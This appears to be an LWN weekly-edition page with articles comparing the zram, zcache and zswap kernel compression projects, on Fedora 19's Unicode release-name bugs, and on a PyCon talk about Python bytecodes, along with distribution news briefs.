Wouldn't it be nice if it were possible to increase the effective amount of data stored in RAM? And, since those CPUs are waiting anyway, perhaps we could use those spare CPU cycles to contribute towards that objective? This is the goal of in-kernel compression: We keep more data — compressed — in RAM and use otherwise idle CPU cycles to execute compression and decompression algorithms.

With the recent posting of zswap, there are now three in-kernel compression solutions proposed for merging into the kernel memory management (MM) subsystem: zram, zcache, and zswap. While a casual observer might think that only one is necessary, the three have significant differences and may target different user bases. So, just as there are many filesystems today co-existing in the kernel, someday there may be multiple compression solutions. Or maybe not... this will be decided by Linus and key kernel developers. To help inform that decision, this article compares and contrasts the different solutions, which we will call, for brevity, the "zprojects". We will first introduce some of the key concepts and challenges of compression. Then we will identify three design layers and elaborate on the different design choices made by the zprojects. Finally, we will discuss how the zprojects may interact with the rest of the kernel and then conclude.

Compression basics

For in-kernel compression to work, the kernel must take byte sequences in memory and compress them, and then keep the compressed version in RAM until some point in the future when the data is needed again. While the data is in a compressed state, it is impossible to read any individual bytes from it or write any individual bytes to it. Then, when the data is needed again, the compressed sequence must be decompressed so that individual bytes can again be directly accessed.

It is possible to compress any number of sequential bytes but it is convenient to use a fixed "unit" of compression. A standard storage unit used throughout the kernel is a "page" which is made up of a fixed constant PAGE_SIZE bytes (4KB on most architectures supported by Linux). If this page is aligned at a PAGE_SIZE address boundary, it is called a "page frame"; the kernel maintains a corresponding "struct page" for every page frame in system RAM. All three zprojects use a page as the unit of compression and allocate and manage page frames to store compressed pages.

There are many possible compression algorithms. In general, achieving a higher "compression ratio" takes a larger number of CPU cycles, whereas less-effective compression can be done faster. It is important to achieve a good balance between time and compression ratio. All three zprojects, by default, use the LZO(1X) algorithm in the kernel's lib/ directory, which is known to deliver a good balance. However, it is important that the choice of algorithm remain flexible; possibly the in-CPU algorithm might be replaced in some cases by an architecture-specific hardware compression engine.

In general, the number of cycles required to compress, and to later decompress, a sequence of bytes is roughly proportional to the number of bytes in the sequence. Since the size of a page is fairly large, page compression and decompression are expensive operations and, so, we wish to limit the number of those operations. Thus we must carefully select which pages to compress, choosing pages that are likely to be used again but not likely to be used in the near future, lest we spend all the CPU's time repeatedly compressing and then decompressing pages. Since individual bytes in a compressed page are inaccessible, we must not only ensure that normal CPU linear byte addressing is not attempted on any individual byte, but also ensure that the kernel can clearly identify the compressed page so that it can be found and decompressed when the time comes to do so.

When a page is compressed, the compression algorithm is applied and the result is a sequence of bytes which we can refer to as a "zpage". The size of a zpage, its "zsize", is highly data-dependent, hard to predict, and highly variable. Indeed the expected distribution of zsize drives a number of key zproject design decisions so it is worthwhile to understand it further. The "compression ratio" for a page is zsize divided by PAGE_SIZE. For nearly all pages, zsize is less than PAGE_SIZE so the compression ratio is less than one, but odd cases may occur where compression actually results in the zsize being larger than PAGE_SIZE. A good compression solution must have a contingency plan to deal with such outliers. At the other extreme, a data page containing mostly zeroes or ones may compress by a factor of 100x or more. For example, LZO applied to an all-zero page results in a zpage with zsize equal to 28, for a compression ratio of 0.0068.

As a rough rule of thumb, "on average", compression has a ratio of about 0.5 (i.e. it reduces a page of data by about a factor of two), so across a wide set of workloads, it is useful to envision the distribution as a bell curve, centered at PAGE_SIZE/2. We will refer to zpages with zsize less than PAGE_SIZE/2 as "thin" zpages, and zpages with zsize greater than PAGE_SIZE/2 as "fat" zpages. For any given workload, of course, the distribution may "skew thin", (if many mostly-zero pages are compressed, for example) or "skew fat", as is true if the data is difficult to compress (already-compressed data like a JPEG image would be an example). A good compression solution must thus be able to handle zsize distributions from a wide range of workloads.

With this overview and terminology, we can now compare and contrast the three zprojects. At a high level, each uses a "data source layer" to provide pages to compress and a "data management layer" to organize and store the zpages. This data management layer has two sublayers, the first for data organization, which we will call the "metadata layer", and the second for determining how best to utilize existing kernel memory and kernel allocation code (such as alloc_page()) to optimally store the zpages, which we will call the "zpage allocator layer".

Data source layer — overview

As previously noted, the nature of compression limits the types and quantities of pages to which it can be applied. It doesn't make sense to compress a page for which there is a high probability of imminent reuse. Nor does it make sense to compress a page for which there is a high probability the data it contains will never again be reused. All three zprojects assume one or more data sources that provide a "pre-qualified" sequence of data pages. In one zproject, an existing kernel subsystem is the data source. For the other two zprojects, previous kernel hooks added as part of the "transcendent memory" projects known as cleancache and frontswap, source the data page stream.

Each data source must also provide a unique identifier, or "key", for each page of data so that the page, once stored and associated with that unique key, can be later retrieved by providing the key. It's also important to note that different data sources may result in streams of pages with dramatically different contents and thus, when compressed, different zsize distributions.

Swap/anonymous pages as a data source

The Linux swap subsystem provides a good opportunity for compression because, when the system is under memory pressure, swap acts as a gatekeeper between (a) frequently used anonymous pages which are kept in RAM, and (b) presumably less frequently used anonymous pages that "overflow", or can be "swapped", to a very-much-slower-than-RAM swap disk. If, instead of using a slow swap disk, we can cause the gatekeeper to store the overflow pages in RAM, compressed, we may be able to avoid swapping them entirely. Further, the swap subsystem already provides a unique key for each page so that the page can be fetched from the swap disk. So, unsurprisingly, all three zprojects consider swap pages as an ideal data source for compression.

One zproject, zram, utilizes the existing swap device model. A zram swap device is explicitly created and enabled in user space (via mkswap and swapon) and this zram device is prioritized (presumably highest) against other configured swap devices. When the swap subsystem sends a data page to the zram device, the page goes through the block I/O subsystem to the zram "driver". All swap pages sent to zram are compressed and associated with a key created by concatenating the swap device identifier and page offset. Later, when the swap subsystem determines (via a page fault) that the page must be brought back in from the swap device to fill a specific page frame, the zram device is notified; it then decompresses the zpage matching the swap device number and page offset into that page frame.

The other two zprojects, zcache and zswap, use the kernel's frontswap hooks (available since Linux 3.5) in the swap subsystem. Frontswap acts as a "fronting store" — a type of a cache — to an existing swap device. It avoids the block I/O subsystem completely; swapped pages instead go directly to zcache/zswap where they are compressed. On the fetch path, when the page fault occurs, the block I/O subsystem is again bypassed and then, as with zram, the page is decompressed directly into the faulting page frame.

There are some subtle but important side effects of the different approaches:

  • The block I/O subsystem is designed to work with fixed-size block devices and is not very happy when a block write results in a failure. As a result, when a poorly-compressible page ("very fat" zpage) is presented to zram, all PAGE_SIZE bytes of the uncompressed page are stored by zram in RAM, for no net space savings. The frontswap-based zprojects have more flexibility; if a very fat zpage is presented, zcache/zswap can simply reject the request, in which case the swap subsystem will pass on the original data page to the real swap disk.

  • Since zram presents itself as a swap disk, user-space configuration is required, but this also means that zram can work on systems with no physical swap device, a configuration common for embedded Linux systems. On the other hand, zcache and zswap depend entirely on already-configured swap devices and so are not functional unless at least one physical swap device is configured and sized adequately. As a result, one might think of zram as being a good match for an embedded environment, while the others are better suited for a more traditional server/data-center environment.

  • It is important to note that all three zprojects must never discard any of these data pages unless explicitly instructed, otherwise user-space programs may experience data loss. Since all three zprojects have a finite capacity on any given system, it is prudent to have a "pressure relief valve". Both zcache and zswap have the ability to "writeback" data to the swapdisk to which the data was originally intended to be written; this cannot be done with zram.

Clean page cache pages as a data source

It is not uncommon for the vast majority of page frames in a running system to contain data pages that are identical to pages already existing on a disk in a filesystem. In Linux, these pages are stored in the page cache; the data in these pages is kept in RAM in anticipation that it will be used again in the future. When memory pressure occurs and the kernel is looking to free RAM, the kernel will be quick to discard some of this duplicate "clean" data because it can be fetched from the filesystem later if needed. A "cleancache" hook, present in the kernel since Linux 3.0, can divert the data in these page frames, sending the pages to zcache where the data can be compressed and preserved in RAM. Then, if the kernel determines the data is again needed in RAM, a page fault will be intercepted by another cleancache hook which results in the decompression of the data.

Because modern filesystems can be large, unique identification of a page cache page is more problematic than is unique identification of swap pages. Indeed, the key provided via cleancache must uniquely identify: a filesystem; an "exportable" inode value representing a file within that filesystem; and a page offset within the file. This combination requires up to 240 bits.

Zcache was designed to handle cleancache pages, including the full range of required keys. As a result, the data management layer is much more complex, consisting of a combination of different data structures which we will describe below. Further, the location of some cleancache hooks in the VFS part of the kernel results in some calls to the data management layer with interrupts disabled which must be properly handled.

Even more than with swap data, filesystem data can proliferate rapidly and, even compressed, can quickly fill up RAM. So, as with swap data, it is prudent to have a pressure-relief valve for page cache data. Unlike swap data, however, we know that page cache data can simply be dropped whenever necessary. Since zcache was designed from the beginning to manage page cache pages, its data management layer was also designed to efficiently handle the eviction of page cache zpages.

Zram can maintain entire fixed-size filesystems in compressed form in RAM, but not as a cache for a non-RAM-based filesystem. In essence, part of RAM can be pre-allocated as a "fast disk" for a filesystem; even filesystem metadata is compressed and stored in zram. While zram may be useful for small filesystems that can entirely fit in RAM, the caching capability provided via cleancache combined with the compression provided by zcache is useful even for large filesystems.

Zswap is singularly focused on swap and so does not make use of the page cache at all or filesystem data as a data source. As a result, its design is simpler because it can ignore the complexities required to handle the tougher page cache data source.

The metadata layer

Once the zproject receives a data page for compression, it must set up and maintain data structures so that the zpage can be stored and associated with a key for that page, and then later found and decompressed. Concurrency must also be considered to ensure that unnecessary serialization bottlenecks do not occur. The three zprojects use very different data structures for different reasons, in part driven by the requirements of data sources to be maintained.

Since the number of swap devices in a system is small, and the number of pages in each is predetermined and fixed, a small, unsigned integer representing the swap device combined with a page offset is sufficient to identify a specific page. So zram simply uses a direct table lookup (one table per configured zram swap device) to find and manage its data. For example, for each data page stored, the zram table contains a zsize, since zsize is useful for decompression validation, as well as information to get to the stored data. Concurrency is restricted, per-device, by a reader-writer semaphore.

Zswap must manage the same swap-driven address space, but it utilizes one dynamic red-black tree (rbtree) per swap device to manage its data. During tree access, a spinlock on the tree must be held; this is not a bottleneck because simultaneous access within any one swap device is greatly limited by other swap subsystem factors. Zswap's metadata layer is intentionally minimalist.

Zcache must manage both swap data and pagecache data, and the latter has a much more extensive key space which drives the size and complexity of zcache data structures. For each filesystem, zcache creates a "pool" with a hash table of red-black tree root pointers; each node in the rbtree represents a filesystem inode — the inode space in an exportable filesystem is often very sparsely populated which lends itself to management by an rbtree. Then each rbtree node contains the head of a radix tree — the data structure used throughout the kernel for page offsets — and this radix tree is used to look up a specific page offset. The leaf of the radix tree points to a descriptor which, among other things, references the zpage. Each hash table entry has a spinlock to manage concurrency; unlike swap and frontswap, filesystem accesses via cleancache may be highly concurrent so contention must be aggressively avoided.

Impact of writeback on the metadata layer

Earlier it was noted that zcache and zswap support "writeback"; this adds an important twist to the data structures in that, ideally, we'd like to write back pages in some reasonable order, such as least recently used (LRU). To that end, both zcache and zswap maintain a queue to order the stored data; zswap queues each individual zpage and zcache queues the page frames used to store the zpages. While lookup requires a key and searches the data structures from the root downward, writeback chooses one or more zpages from the leaves of the data structure and then must not only remove or decompress the data, but must also remove its metadata from the leaf upward. This requirement has two ramifications: First, the leaf nodes of data structures must retain the key along with information necessary to remove the metadata. Second, if writeback is allowed to execute concurrently with other data structure accesses (lookup/insert/remove), challenging new race conditions arise which must be understood and avoided.

Zswap currently implements writeback only as a side effect of storing data (when kernel page allocation fails) which limits the possible race conditions. Zcache implements writeback as a shrinker routine that can be run completely independently and, thus, must handle a broader set of potential race conditions. Zcache must also handle this same broader set when discarding page cache pages.

Other metadata layer topics

One clever data management technique is worth mentioning here: Zram deduplicates "zero pages" — pages that contain only zero bytes — requiring no additional storage. In some zsize distributions, such pages may represent a significant portion of the zpages to be stored. While the data of the entire page may need to be scanned to determine if it is a zero page, this overhead may be small relative to that of compression and, in any case, it pre-populates the cache with bytes that the compression algorithm would need anyway. Zcache and zswap should add this feature. More sophisticated deduplication might also be useful. Patches are welcome.

Zpage allocator layer

Memory allocation for zpages can present some unique challenges. First, we wish to maximize the number of zpages stored in a given number of kernel page frames, a ratio which we will call "density". Maximizing the density can be challenging as we do not know a priori the number of zpages to be stored, the distribution of zsize of those zpages, or the access patterns which insert and remove those zpages. As a result, fragmentation can be a concern. Second, allocating memory to store zpages may often occur in an environment of high-to-severe memory pressure; an effective allocator must handle frequent failure and should minimize large (i.e. multiple-contiguous-page) allocations. Third, if possible, we wish the allocator to support some mechanism to enable ordered writeback and/or eviction as described above.

One obvious alternative is to use an allocator already present and widely used in the kernel: kmalloc(), which is optimized for allocations that nicely fit into default sizes of 2N byte chunks. For allocations of size 2N+x, however, as much as 50% of the allocated memory is wasted. kmalloc() provides an option for "odd" sizes but this requires pre-allocated caches, often of contiguous sets of pages ("higher order" pages) which are difficult to obtain under memory pressure. Early studies showed that kmalloc() allocation failures were unacceptably frequent and density was insufficient, so kmalloc() was discarded and other options were pursued, all based on alloc_page(), which always allocates a single page frame.

To improve density, the xvmalloc allocator was written, based on the two-level sequential fit (TLSF) algorithm. Xvmalloc provided high density for some workloads and was the initial default allocator for zram and for the frontswap-driven portion of the initial zcache. It was found, however, that the high density led to poor fragmentation characteristics, especially for zsize distributions that skewed fat. Xvmalloc has since been discarded (though remnants of it survive through Linux 3.8.)

A new allocator, zbud, was written for the cleancache-driven portion of the original zcache code. The initial version of zbud had less focus on high density and more on the ability to efficiently evict cleancache-provided zpages. With zbud, no more than two zpages are contained in a page frame, buddying up a pair of zpages, one fat and one thin. Page frames, rather than zpages, are entered into an LRU queue so that entire page frames can be easily "freed" to the system. On workloads where zsize skews thin, a significant amount of space is wasted, but fragmentation is limited, and eviction is still easy.

Zsmalloc, an allocator intended to "rule them all", was then written. Zsmalloc takes the best of kmalloc() but with the ability to provide the complete range of "size classes" suitable to store zpages; zsmalloc also never requires higher-order allocations. All zpages with zsize within a "class" (e.g. between 33-48 bytes) are grouped together and stored in the same "zspage". A clever feature (especially useful for fat zpages) allows discontiguous page frames to be "stitched" together, so that the last bytes in the first page frame contain the first part of the zpage and the first bytes of the second page frame contain the second part. A group of N of these discontiguous pages are allocated on demand for each size class, with N chosen by the zsmalloc code to optimize density.

As a result of these innovations, zsmalloc achieves great density across a wide range of zsize distributions: balanced, fat, and thin. Alas, zsmalloc's strengths also proves to be its Achilles heel: high density and page crossings make it very difficult for eviction and writeback to concurrently free page frames, resulting in a different kind of fragmentation (and consequent lower density) and rendering it unsuitable for management of cleancache-provided pages in zcache. So zbud was revised to utilize some of the techniques pioneered by zsmalloc. Zbud is still limited to two zpages per page frame, but when under heavy eviction or writeback, its density compares favorably with zsmalloc. The decision by zcache to use zbud for swap pages sadly led to a fork of zcache, first to "old zcache" (aka zcache1) and "new zcache" (aka zcache2) and then to a separate zproject entirely, zswap, because the author prefers the density of zsmalloc over the ability to support cleancache pages and the predictability and page frame-reclaim of zbud.

So, today, there are two zpage allocators, both still evolving. The choice for best zpage allocator depends on use models and unpredictable workloads. It may be possible that some hybrid of the two will emerge, or perhaps some yet unwritten allocator may arise to "rule them all".

Memory management subsystem interaction

In some ways, a zproject is like a cache for pages temporarily removed from the MM subsystem. However it is a rather unusual cache in that, to store its data, it steals capacity (page frames) from its backing store, the MM subsystem. From the point-of-view of the MM subsystem, the RAM is just gone, just as if the page frames were absorbed by a RAM-voracious device driver. This is a bit unfortunate, given that both the zproject and the MM subsystem are respectively, but separately, managing compressed and uncompressed anonymous pages (and possibly compressed and uncompressed page cache pages as well). So it is educational to consider how a zproject may "load balance" its memory needs with the MM subsystem, and with the rest of the kernel.

Currently, all three zprojects obtain page frames using the standard kernel alloc_page() call, with the "GFP flags" parameter chosen to ensure that the kernel's emergency reserve pages are never used. So each zproject must be (and is) resilient to the fairly frequent situation where an alloc_page() call returns failure.

Zram makes no other attempt to limit its total use of page frames but, as we've seen, it is configured by the administrator as a swap device, and swap parameters do limit the number of swap pages, and thus zpages, that can be accepted. This indirectly but unpredictably limits the number of page frames used. Also, the configuration is independent of and not cognizant of the total RAM installed in the system, so configuration errors are very possible.

Zswap uses a slightly modified version of zsmalloc to track the total number of page frames allocated. It ensures this number does not exceed a certain percent of total RAM in the system, and this limit is configurable via sysfs. As previously noted, using writeback, zswap can reduce the number of (anonymous) zpages stored and this, indirectly, can reduce the number of page frames, though at the likely cost of fragmentation.

Zcache and zbud were designed from the beginning with much more dynamic constraints on page frame utilization in mind, intended eventually to flexibly mesh with the dramatically time-varying memory balancing algorithms that the MM subsystem uses. While the exact interaction model and best future control policy are not yet determined, zcache's and zbud's underlying page frame-based writeback and eviction mechanisms support a shrinker-like interface that can be told to, for example, reduce the number of page frames used for storing anonymous zpages from 10000 to 8937 and the number of page frames used for storing page cache zpages from 3300 to 463, and zcache can do that. Since zbud is much more predictable (two zpages per page frame), the MM subsystem can estimate and manage both the total number of anonymous and pagecache pages (compressed and uncompressed) in the system and the total number of page frames used to manage them.

Status and conclusions

Zram, zcache, and zswap are all advancing the concept of in-kernel compression in different ways. Zram and zcache are in-tree but both still in the staging tree. While the staging tree has served to expose the concept of in-kernel compression to a wide group of kernel developers and even to the users of a few leading-edge distributions, as Andrew Morton says, the staging tree "is where code goes to be ignored." Staging tree maintainer Greg Kroah-Hartman has become reluctant to accept any new zproject functionality into the staging tree. This creates a conundrum for these zprojects: evolution in the staging tree has resulted in rapid improvements in the design and implementation and exposure of the zprojects, but because of this evolution they are not stable enough for promotion into the core kernel and further evolution is now stymied.

Zswap is attempting to circumvent the staging tree entirely by proposing what is essentially a simplified frontswap-only fork of zcache using zsmalloc instead of zbud, for direct merging into the MM subsystem. Since it is also much simpler than zcache, it has garnered more reviewers which is a valuable advantage for to-be-merged code. But it is entirely dependent on the still-in-staging zsmalloc, does not support page cache pages at all, and does not support page-frame-based writeback, so its simplicity comes at a cost. If zswap is merged, it remains to be seen if it will ever be extended adequately.

So, in-kernel compression has clear advantages and real users. It remains unclear though when (or if) it will be merged into the core kernel and how it should interact with the core kernel. If you are intrigued, the various zproject developers encourage your ideas and contributions.

Acknowledgments

Nitin Gupta was the original author of compcache and I was the original author of transcendent memory. While both projects were initially targeted to improve memory utilization in a multi-tenant virtualized environment, their application to compression in a single kernel quickly became apparent. Nitin designed and wrote the Linux code for zram, xvmalloc, and zsmalloc, and wrote an early prototype implementation of zcache. I wrote frontswap and cleancache (with the cleancache hook placement originally done by Chris Mason), and the Linux code for zcache, zbud, and ramster. Seth Jennings contributed a number of improvements to zcache and is the author of zswap. Kernel mm developer Minchan Kim was a helpful influence for all the zprojects, and none of the zprojects would have been possible without Greg Kroah-Hartman's support — and occasional whippings — as maintainer of the staging drivers tree.

As with any open-source project, many others have contributed ideas, bug fixes, and code improvements and we are thankful for everyone's efforts.

Comments (31 posted)

Patches and updates

Kernel trees

Core kernel code

Device drivers

Documentation

Filesystems and block I/O

Memory management

Networking

Security-related

Page editor: Jonathan Corbet

Distributions

Schrödinger's 😻 and outside-the-box naming

By Nathan Willis
April 3, 2013

What's in a string? That depends on who you ask, apparently; a lesson that Fedora recently learned when it unexpectedly ran into a problem with the release name for the upcoming Fedora 19, "Schrödinger's Cat"—and all of the unusual characters contained within. Typographic oddities might seem like a trivial reason to upend the distribution release process, but a validation tool in the bug reporting system objected to the name, so Fedora developers found themselves asking whether it was more practical to stop and fix all of the utilities, or to change the release name itself.

The problem, of course, is that unlike previous Fedora release names, "Schrödinger's Cat" contains some characters outside of the basic Latin alphabet: an o with umlaut and an apostrophe. But the specific issue encountered in the wild is even more specific than that; the "apostrophe" in question is frequently typed as the similar-looking but different single-quote character, and quotes can wreak havoc when the release name is processed by a shell script. On March 16, Adam Williamson reported a bug in the Fedora bug reporting tool: when reporting a bug against Fedora 19, the server side threw an error when it tried to validate the name of the release, complaining of "illegal characters."

The root of the bug was quickly traced to libreport, which contains an is_text_file() function. The function determines whether or not a given file is text by whether 2% of the bytes are greater than 0x80. Two percent is a rather arbitrary limit, and in this case the file triggering the error was /etc/os-release, which consisted of a single line:

    Fedora release 19 (Schrödinger's Cat)

Dave Malcolm pointed out that the /etc/os-release manual page says non-alphanumeric characters should be escaped "with backslashes, following shell style," and Denys Vlasenko patched is_text_file() to bump the acceptable-character threshold from 2% to 10%. But that fix was a simple workaround; as others in the bug comments pointed out, the function should test whether the contents of the file are really valid UTF-8 text, which the 0x80 test does not do.

Vlasenko did commit a more substantive patch a few days later, but libreport was not the only utility to stumble when it encountered the new release name. Another bug opened by Williamson reported that grub2 also broke when it encountered /etc/os-release, due to the un-escaped single-quote character.

Schrödinger, Schmodinger

On the Fedora development list, Sérgio Basto proposed one change that would solve both problems (and, hopefully, any others stemming from the unusual release name): formally change the release name from "Schrödinger's Cat" to "Schrodingers Cat" or some similar variation that stuck to pure ASCII characters. After all, as Chris Murphy commented, there are likely to be many more utilities that cannot handle the release name, and the project will continue to encounter them as the development cycle progresses.

But, to others, simply changing the release name amounts to "papering over" the real issue, which is ensuring that the build and QA tools can handle arbitrary UTF-8 text. Surely it is better to spend a little time now to fix the issues than to avoid them, the thinking went. Williamson, however, disagreed, calling it "a question of priorities" in light of Fedora's human resources and release schedule. Later, he elaborated that fixing UTF-8 support in the problematic tools in separate branches would be acceptable, if it did not slow down the release:

You want to set up a side project to spin some images with crazy release names and see what breaks and fix that, then you know, go for it. But I'm trying to ship an operating system that works here, and leaving something we know is causing all kinds of problems in the problematic state just so we can keep finding exciting new problems to fix does not suffuse me with joy.

If we have to compromise on just papering it over for Alpha, I mean, _fine_. But seriously: sometimes papering it over is just the right thing to do.

Similarly, Chris Adams pointed out that the deadline for adding new features for Fedora 19 had already passed; adding UTF-8 support to a variety of tools may be important, but there is no doubt that it amounts to a feature. But G.Wolfe Woodbury contended that the real issue was proper internationalization, and that "not defensively programming for such cases is short-sighted."

Solutions and open questions

Jaroslav Reznik opened a Fedora Engineering Steering Committee (FESCo) ticket on the subject, offering two alternatives: fixing UTF-8 and character-handling issues as they arise, or changing the release name to something similar but less problematic (perhaps "Cat of Schroedinger" or the proper German "Schroedinger Katze").

The discussion on the mailing list continued, including mention of the very real risk that after Fedora 18's lengthy delays, the prospect of holding up Fedora 19's release to fix a character string would amount to a terrible public relations blunder. But Peter Jones found a compromise solution and posted a patch changing Schrödinger's Cat to Schrödinger’s Cat in the affected files. The two strings may not look too different (in fact, depending on one's font, they may look identical), but the second replaces the "typewriter apostrophe" character at Unicode point U+0027 to the "punctuation apostrophe" at U+2019. The typewriter apostrophe is interpreted as a shell quote character, but the punctuation apostrophe is not. Rarely do the differences in Unicode's byzantine slate of similar code points solve more problems than they create—just look at curly- versus straight-quotes in HTML, for example—but in this case, the change allowed /etc/os-release to work once again. FESCo voted to approve the apostrophe change and to fix any other UTF-8 support issues encountered during the development cycle.

Of course, the apostrophe compromise leaves the potential for other UTF-8 support issues to be encountered, and sidesteps the quote-character issue. That bodes well for Fedora 19's release date not getting pushed back due to a last-minute "umlaut bug," but it means less rigorous testing on the release build tools. FESCo subsequently ruled that future release names shall not include "shell metacharacters." That is a practical trade-off; as several list members pointed out, by changing the problematic string, an unknown number of character-handling bugs may go undetected by Fedora—but they could still bite other projects that use the Fedora tools. In the long run, the tools will still need fixing.

In fact, some participants in the mailing list discussion proposed adding non-alphanumeric characters to future release names just to see what happens. Paul Flo Williams predicted someone proposing "Motörhead's Moshpit" as the Fedora 20 release name because of the non-ASCII characters, while Richard M. Jones suggested ☃ (the Unicode "snowman" character U+2603, also known as HTML character entity &9731; or ☃). Peter Robinson proposed the project go right for the goal and choose "DROP table *;".

On the other side of the debate, some developers were less than amused. Fedora has had its share of project members who object to release names altogether; Jóhann B. Guðmundsson said:

People wanted to continue to use release names and voted both on that topic and the name.

They also get the benefit of fixing what breaks in the process.

Anti-release-name comments did not elicit much further debate, so it seems likely that release names will continue to cling on for at least one more release cycle. But it is true that "Schrödinger's Cat" caused some problems due to the unpredictable effect it has on development and release tools. On the whole, though, the problems it revealed are problems worth solving—there is no telling what characters downstream spins and Fedora derivatives might put into a string.

The distribution will be better for catching and correcting assumptions about character encodings and non-alphanumeric strings. Robinson noted that Fedora 19's release name was chosen roughly six months ago during the Fedora 18 Alpha period; nevertheless it took six months for anyone to encounter a bug related to it precisely because of how deeply buried the problem was. A release name might be a lowly string, primarily chosen for amusement value, but the issue should remind all distributions how subtle such bugs can be, and Fedora clearly stands to benefit now that the cat is out of the bag.

[Special hat tip to Don Marti for proposing "Schrödinger's 😻" as an alternative name. "If you're going to do Unicode, do Unicode."]

Comments (52 posted)

Brief items

Distribution quotes of the week

At this point I have the feeling that Prelink is a cargo cult which we keep around to appease the Airplane Gods.
-- Stephen Smoogen

I'll send another email later, when I have more time, to explain how I feel about email pre-notifications for other emails. The short version: everyone should do those, it's quite helpful to get some advance notice when someone is planning to post an email with content. Then we can be on the lookout for it.
-- Peter Samuelson

Maybe we could at least try to describe the cloud a bit, though? That one looks like a fluffy bunny....
-- Matthew Miller

Comments (none posted)

Scientific Linux 6.4 released

Scientific Linux has announced the release of Scientific Linux 6.4. The release notes have more details.

Comments (none posted)

Ubuntu EOL announcements

Ubuntu has announced the end of support for three versions on May 9; 11.10 (Oneiric Ocelot), 10.04 LTS (Lucid Lynx) Desktop, and 8.04 LTS (Hardy Heron). Ubuntu 10.04 LTS Server will be supported for another two years.

Comments (none posted)

Newsletters and articles of interest

Distribution newsletters

Comments (none posted)

Hands-on with Mozilla’s Web-based “Firefox OS” (ars technica)

Ars technica has a detailed review of a Firefox OS handset. "So Mozilla has succeeded in building an HTML-based platform that allows Mozilla to build apps that 'feel' native. But the much harder task will be to provide third-party developers tools to build apps with the same level of polish and convince them to use them. So far, the Firefox OS app store seems to have few, if any, examples of third-party apps that meet the high bar Mozilla has set for its own apps."

Comments (none posted)

Chakra: A Simple, Strong Energy Center for Your Desktop (LinuxInsider)

LinuxInsider reviews Chakra Linux. "In keeping Chakra a purely simple Linux experience, developers stripped away most of the choice that makes Linux more than a one-size-fits-all desktop -- it only comes in KDEmod. This is a lean KDE desktop without the meta entanglements that contribute to software bloat. Other desktop varieties -- Gnome, Cinnamon, Unity, Xfce and LXDM -- do not exist and will not be added."

Comments (1 posted)

Page editor: Rebecca Sobol

Development

PyCon: Peering in on bytecodes

By Jake Edge
April 3, 2013

While the advertised singing and dancing never materialized, Larry Hastings's PyCon 2013 talk did look at a largely overlooked topic: Python bytecodes. The Python virtual machine (VM) operates on these bytecodes, and Hastings's talk explored what they are and do, how they can be examined, and why folks might be interested. But the talk also featured some concrete uses of bytecodes, including introducing the "simplest possible VM" written in Python, a pure-Python assembler/disassembler, and a Forth interpreter targeting the Python VM.

Hastings is a Python core developer who is also serving as the release manager for Python 3.4. That release is currently targeted for February 2014.

Introduction

[Larry Hastings]

Bytecodes have been used in language implementations going back to the early days of computing. The idea is to turn the input language into a simpler form that can be run on some particular VM. Python bytecodes are an implementation detail specific to CPython (the C language version of Python, which is what most people think of as "Python"); the talk looked at the bytecodes used by CPython 3.3.

The ideas behind bytecode (though not the bytecodes themselves) are roughly applicable to other versions of CPython or for implementations like PyPy (a Python interpreter written in Python). PyPy has bytecodes that are similar but not the same as those of CPython. Implementations like Jython and IronPython have very different bytecodes because the whole point of those is to target a different VM. The concepts behind bytecode will be applicable to all of those, though.

Bytecode is the assembly language for the Python VM, which is "both virtual and a machine", he said. It is virtual in the "sense that it doesn't really exist", it is not something you could "go over and kick". It is a machine, in the sense of a computer, because it has registers and a stack, and bytecode is just the code that operates on that machine.

There are essentially four different kinds of bytecodes in the Python VM. There is a data stack and a set of bytecodes to add and remove items from that stack. There are flow-control bytecodes that allow you to manipulate the instruction pointer to jump forward and backward in the code. The standard arithmetic operations are another set of bytecodes. The final type are the "Pythonic" bytecodes, which do things specific to the language, like creating a tuple or a set.

Any time that Python is running code, it is running bytecode. By definition, everything that is expressible in Python can be turned into bytecode, but the reverse is not true—there are bytecode sequences that are not translatable into valid Python. The reason that Python uses bytecode is to "manage complexity" in implementing the language. It is a common way to implement an interpreted language. Ruby has bytecodes, as does PHP ("although they're crazy ... seriously").

If you are going to be a core contributor, it makes sense to study bytecode, though there are areas of the core where that knowledge is not required at all. Hastings is somewhat skeptical of the other commonly cited reasons—"so I'm really wasting your time"—but the presentation made the subject interesting, even if only as an academic exercise. For example, understanding what's "really going on" in the interpreter is one reason for understanding bytecode, but that's a bit dubious because there is more to it than that. Understanding the bytecode means understanding C, which means understanding assembly language, microcode, transistors, and, eventually, quantum mechanics. You can get really far with Python programming without knowing anything about quantum mechanics, he said.

Hand optimizing bytecode for performance is another commonly cited reason, but there are much better ways to optimize your program and bytecode is somewhat fragile—bytecode can change between Python releases. If you are a pure Python developer, there is one reason to know about bytecode: it is the granularity at which the global interpreter lock (GIL) operates. The GIL can switch to a different thread between bytecodes, but not while executing a given bytecode operation, as the interpreter atomically executes individual bytecodes.

Disassembling "gunk"

Hastings presented a function called "gunk", that "doesn't do anything useful", but will illustrate some of the attributes of bytecode.

    def gunk(a=1, *args, b=3):
        print(args)
        c = None
        return (a + b, c)
It is a Python-3-only function due to the argument list (and print as a function). It has a positional argument a, with a default of 1, args holds all the rest of the positional arguments, and b is a keyword argument with a default of 3. The function prints the args list, sets local variable c, and returns a tuple. Its bytecode can be examined using the dis (disassembler) module:
    >>> import dis
    >>> dis.dis(gunk)
      2           0 LOAD_GLOBAL              0 (print)
		  3 LOAD_FAST                2 (args)
		  6 CALL_FUNCTION            1 (1 positional, 0 keyword pair)
		  9 POP_TOP

      3          10 LOAD_CONST               0 (None)
		 13 STORE_FAST               3 (c)

      4          16 LOAD_FAST                0 (a)
		 19 LOAD_FAST                1 (b)
		 22 BINARY_ADD
		 23 LOAD_FAST                3 (c)
		 26 BUILD_TUPLE              2
		 29 RETURN_VALUE
Bytecode consists of a single-byte operation code (opcode) followed by an optional two-byte parameter. Thus, bytecodes are either one or three bytes in length. The first column in the disassembly shows the line number in the function, the second is the address of the opcode (i.e. the sum of the sizes of the previous bytecodes), third is the opcode itself, fourth is the opcode's parameters, and last is an interpretation of the parameter.

The output from dis leaves something to be desired, he said. For example "0" turns into "print" somehow, but dis doesn't explain it. Nor does it show the defaults of the arguments, or make a distinction between arguments and local variables. All of that led Hastings to write his own assembler/disassembler, which he described at the end of the talk.

There are 101 different opcodes in Python 3.3. The dis.HAVE_ARGUMENT constant (currently 90) governs whether a given opcode has an argument or not. If the opcode is less than that value, it has no argument, and is one byte in size.

